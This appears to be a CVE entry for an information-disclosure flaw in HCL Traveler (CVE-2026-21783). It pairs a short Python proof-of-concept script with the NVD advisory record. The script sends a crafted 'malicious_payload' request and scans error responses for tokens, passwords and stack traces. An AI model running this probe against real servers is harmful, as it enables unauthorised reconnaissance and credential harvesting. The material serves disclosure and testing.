CVE-2026-21783

import requests # Target URL (Replace with actual target) target_url = "http://target-hcl-traveler.com/servlet" # Headers to simulate a legitimate browser request (optional) headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" } # Payload designed to trigger an error or exception # This might be an invalid parameter, malformed JSON, or unexpected input malicious_payload = { "action": "invalid_action_trigger", "debug": "true" } try: # Send GET request with the payload response = requests.get(target_url, params=malicious_payload, headers=headers, timeout=10) # Check if the response status code indicates a server error (e.g., 500) if response.status_code >= 500: print("[+] Server error triggered (Status Code: {}).".format(response.status_code)) # Analyze response content for sensitive information leakage response_text = response.text sensitive_keywords = ["internal path", "stack trace", "token", "password", "exception", "at ", "file://"] found_info = False for keyword in sensitive_keywords: if keyword.lower() in response_text.lower(): print("[!] Potential sensitive information found: '{}'.".format(keyword)) found_info = True if found_info: print("[+] Vulnerability Confirmed: Sensitive information disclosed in error message.") # print("--- Response Snippet ---") # print(response_text[:500]) # Print first 500 chars for verification else: print("[-] Error triggered, but no obvious sensitive data leaked in response.") else: print("[-] Request did not trigger a server error. Status Code: {}".format(response.status_code)) except requests.exceptions.RequestException as e: print("[-] Request failed: {}".format(e))

{"cve": {"id": "CVE-2026-21783", "sourceIdentifier": "[email protected]", "published": "2026-03-24T20:16:26.093", "lastModified": "2026-03-31T21:02:00.767", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL Traveler is affected by sensitive information disclosure.  The application generates some error messages that provide detailed information about errors and failures, such as internal paths, file names, sensitive tokens, credentials, error codes, or stack traces.  Attackers could exploit this information to gain insights into the system's architecture and potentially launch targeted attacks."}, {"lang": "es", "value": "HCL Traveler se ve afectado por una revelación de información sensible. La aplicación genera algunos mensajes de error que proporcionan información detallada sobre errores y fallos, como rutas internas, nombres de archivo, tokens sensibles, credenciales, códigos de error o trazas de pila. Los atacantes podrían explotar esta información para obtener información sobre la arquitectura del sistema y potencialmente lanzar ataques dirigidos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-209"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:traveler:*:*:*:*:*:*:*:*", "versionEndExcluding": "14.5.1.0", "matchCriteriaId": "2322008C-F1C9-4A93-913E-34478A2AA771"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129139", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}